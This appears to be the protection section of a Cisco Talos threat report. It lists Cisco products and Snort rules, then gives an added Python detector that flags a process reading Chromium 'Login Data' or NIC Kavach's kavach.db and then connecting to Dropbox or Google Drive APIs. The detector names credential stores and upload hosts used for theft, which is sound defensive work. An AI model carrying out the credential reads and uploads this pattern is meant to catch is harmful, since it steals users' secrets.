Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs 57842 - 57849 can protect against the threats outlined in this paper.

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat.
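As an added illustration of the host-side correlation the Nodachi and credential-stealer sections describe, this Python example (not code from the report or from Cisco Talos) flags a process that reads a Chromium "Login Data" file or kavach.db and shortly afterwards connects to a DropBox or Google Drive API host; the telemetry lines, the allowlisted process names and the upload hostnames are constructed assumptions.

```python
"""Added example (not code from the Talos report): flag a process that reads a
credential store named in the report and then uploads to a cloud-storage API."""
from datetime import datetime

# Credential stores the report describes being stolen: Chromium "Login Data"
# and the NIC Kavach client's kavach.db (matched as lower-cased path suffixes).
SENSITIVE_SUFFIXES = ("\\login data", "\\kavach.db")
# Assumed upload endpoints for the DropBox and Google Drive APIs used for exfiltration.
UPLOAD_HOSTS = {"content.dropboxapi.com", "api.dropboxapi.com", "www.googleapis.com"}
# Assumed allowlist of images expected to touch these stores or hosts legitimately.
EXPECTED_IMAGES = {"chrome.exe", "msedge.exe", "dropbox.exe", "kavach.exe"}

# Constructed endpoint telemetry: "<ISO time>|<pid>|<image>|<event type>|<target>".
SAMPLE_TELEMETRY = """\
2021-03-25T09:00:01|4120|chrome.exe|file_read|C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data
2021-03-25T09:00:05|4120|chrome.exe|net_connect|www.googleapis.com
2021-03-25T09:02:10|5588|updater.exe|file_read|C:\\Users\\alice\\AppData\\Roaming\\kavach.db
2021-03-25T09:02:12|5588|updater.exe|file_read|C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data
2021-03-25T09:02:30|5588|updater.exe|net_connect|www.googleapis.com
2021-03-25T09:30:00|7001|notepad.exe|file_read|C:\\Users\\alice\\Documents\\notes.docx
2021-03-25T09:31:00|7001|notepad.exe|net_connect|content.dropboxapi.com
""".splitlines()


def parse_event(line):
    """Split one telemetry line into a dict; the image name is lower-cased for matching."""
    ts, pid, image, kind, target = line.strip().split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "pid": int(pid),
            "image": image.lower(), "kind": kind, "target": target}


def find_credential_exfil(lines, window_seconds=600):
    """Return (pid, image, file, host) for each credential-store read that the same
    non-allowlisted process follows within window_seconds by an upload-host connection."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    reads = {}  # pid -> [(read time, path), ...]
    hits = []
    for ev in events:
        if ev["image"] in EXPECTED_IMAGES:
            continue
        if ev["kind"] == "file_read" and ev["target"].lower().endswith(SENSITIVE_SUFFIXES):
            reads.setdefault(ev["pid"], []).append((ev["ts"], ev["target"]))
        elif ev["kind"] == "net_connect" and ev["target"].lower() in UPLOAD_HOSTS:
            for read_ts, path in reads.get(ev["pid"], []):
                if 0 <= (ev["ts"] - read_ts).total_seconds() <= window_seconds:
                    hits.append((ev["pid"], ev["image"], path, ev["target"]))
    return hits
```

On the constructed sample only the unexpected `updater.exe` process is reported (once for kavach.db and once for Login Data); the browser's own Google API traffic and an unrelated .docx read are not.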